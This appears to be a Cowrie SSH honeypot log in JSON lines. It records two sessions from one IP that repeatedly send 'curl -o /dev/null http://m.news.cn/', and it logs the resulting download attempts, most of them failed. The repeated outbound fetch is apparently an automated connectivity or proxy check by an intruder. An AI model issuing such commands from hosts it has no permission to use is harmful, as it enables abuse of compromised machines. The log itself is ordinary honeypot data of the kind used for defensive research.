{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.603212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.606399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.607282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.646248Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.652645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.653677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.656508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.657394Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.664768Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.666183Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.718757Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.720628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.762502Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.763978Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.804481Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.805514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.807865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.809301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.823091Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.871624Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.873364Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.921700Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.924027Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.968242Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.970887Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.980883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.981930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.985141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.986193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.020361Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.022015Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.031425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.032513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.035384Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.036237Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.040446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.063901Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.065278Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.069778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.070706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.075442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.076365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.107203Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.108959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.109995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.113129Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.114943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.115935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.155828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.156888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.160268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.161128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.195159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.196287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.198054Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.200099Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.201528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.202109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.236011Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.237817Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.279444Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.280560Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.317898Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.319318Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.354929Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.431184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.432423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.435776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.436548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.469220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.470304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.472833Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.473707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.515415Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.544982Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.561649Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.616572Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.617935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.621314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.622334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.696154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.697435Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.701240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.702504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.740933Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.742682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.769107Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.770240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.772612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.773335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.796165Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.798327Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.806495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.807501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.810689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.811480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.830979Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.833026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.866651Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.869486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.876111Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.877136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.880771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.881896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.903979Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.921048Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.922175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.925810Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.926802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.934026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.957501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.958640Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.972580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.973581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.977483Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:36.996524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:36.997571Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.013564Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.014574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.017924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.036204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.037295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.054384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.055432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.058874Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.060756Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
